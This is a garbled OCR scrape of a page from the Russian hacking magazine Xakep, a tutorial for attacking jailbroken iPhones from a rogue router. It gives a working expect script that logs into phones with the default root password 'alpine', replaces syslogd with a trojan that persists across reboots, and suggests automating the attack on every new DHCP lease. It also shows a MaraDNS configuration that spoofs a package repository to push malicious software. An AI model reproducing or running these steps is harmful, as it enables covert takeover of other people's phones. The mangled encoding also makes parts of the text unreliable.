ÛãçèØÃÂ¥ Ã’ØàãáÞÃÂ’ - Xakep Online
ÛãçèØÃÂ¥ Ã’ØàãáÞÃÂ’ - Xakep Online
ÛãçèØÃÂ¥ Ã’ØàãáÞÃÂ’ - Xakep Online
You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
взлом<br />
Динамо-машина для зарядки ноутбука. Крути педали, пока не дали…<br />
поставить компилятор на сам роутер. Устанавливаем все<br />
необходимое:<br />
ipkg install buildroot<br />
ipkg install make<br />
ipkg install tcl<br />
ipkg install scponly<br />
ipkg install openssh-client<br />
Сразу отредактируем /etc/ssh/ssh_config, добавив<br />
строчку «StrictHostKeyChecking no», чтобы SSH-клиент<br />
не выдавал сообщение о принятии новых сессионных<br />
ключей для каждой жертвы. Затем скачиваем исходники<br />
expect отсюда: http://expect.nist.gov/expect.tar.gz.<br />
Распаковываем и собираем, как обычно: ./configure,<br />
make, make install. Может потребоваться установить<br />
переменную окружения: «setenv TCL_LIBRARY /usr/<br />
bin/tcl8.4.19/Library». Теперь напишем скрипт, который<br />
будет пытаться подключиться к телефону с дефолтной<br />
связкой логин-пароль. Получится что-нибудь наподобие<br />
этого:<br />
#!/usr/bin/expect<br />
spawn scp /www/iphone-trojan root@10.0.0.2:/<br />
usr/sbin/syslogd<br />
expect assword {send alpine\r}<br />
spawn ssh root@10.0.0.2<br />
expect assword {send alpine\r}<br />
send “ldid –S /usr/sbin/syslogd\r”<br />
send “exit\r”<br />
expect eof<br />
В случае успеха демон системных логов на захваченном<br />
телефоне заменится нашей программой iphone-trojan, которая<br />
будет выполняться при каждом рестарте системы. Что<br />
это будет за программа, мы рассмотрим ниже. Предлагаю в<br />
качестве самостоятельного упражнения связать логи dhcpсервера<br />
с выполнением этого скрипта так, чтобы атака<br />
осуществлялась на каждый новый выданный IP. Можешь<br />
также установить nmap и перед запуском проверять, что<br />
подцепился именно iPhone.<br />
XÀÊÅÐ 04 /124/ 09<br />
Делается это командой nmap –O2 10.0.0.Х. Стоит отметить,<br />
что сканирование nmap’ом занимает приличное<br />
время, поэтому куда выгоднее просто пытаться атаковать<br />
сразу после подключения клиента. Тут уж решай сам.<br />
ДЕЛАЙ ТРИ. ЛОЖНЫЙ РЕПОЗИТОРИЙ INSTALLER<br />
Эта атака была описана в моей предыдущей статье. Если<br />
вкратце, — суть заключается в подмене DNS-адреса<br />
репозитория менеджера пакетов Installer. Менеджер устанавливается<br />
на все джеилбрейкнутые телефоны, коих, по<br />
некоторым оценкам, > 50% среди всех iPhone в нашей стране.<br />
Выглядит это так: пользователь подключается к нашему<br />
терминатору, открывает Installer и устанавливает обновление<br />
самого менеджера пакетов. Но вместе с оригинальной<br />
программой на телефон заливается любая другая.<br />
Приступим к настройке. Устанавливаем DNS-сервер:<br />
#~ipkg install maradns<br />
Меняем настоящий IP сервера с репозиторием i.ripdev.com<br />
на наш. Для этого редактируем /etc/mararc и /etc/marands/<br />
ripdev.com:<br />
/etc/mararc:<br />
ipv4_bind_addresses = "127.0.0.1, 10.0.0.1"<br />
chroot_dir = "/etc/maradns" //ìåñòî, ãäå áóäóò<br />
ëåæàòü êîíôèãè çîí, ìîæíî âûáðàòü, íàïðèìåð,<br />
òî÷êó ìîíòèðîâàíèÿ ôëåøêè…<br />
recursive_acl = "127.0.0.1/8, 10.0.0.0/24" //<br />
ðàçðåøàåì ðåêóðñèâíûå çàïðîñû<br />
zone_transfer_acl = "127.0.0.1/8,<br />
10.0.0.0/24" //ðàçðåøàåì ïåðåñûëêó çîí<br />
timeout_seconds = 2<br />
csv1 = {}<br />
csv1["ripdev.com."] = "ripdev.com"<br />
dns_port = 53<br />
maximum_cache_elements = 1024<br />
min_ttl_cname = 900<br />
/etc/maradns/ripdev.com:<br />
dvd<br />
На диске ты найдешь<br />
исходники программы<br />
для отправки SMS.<br />
067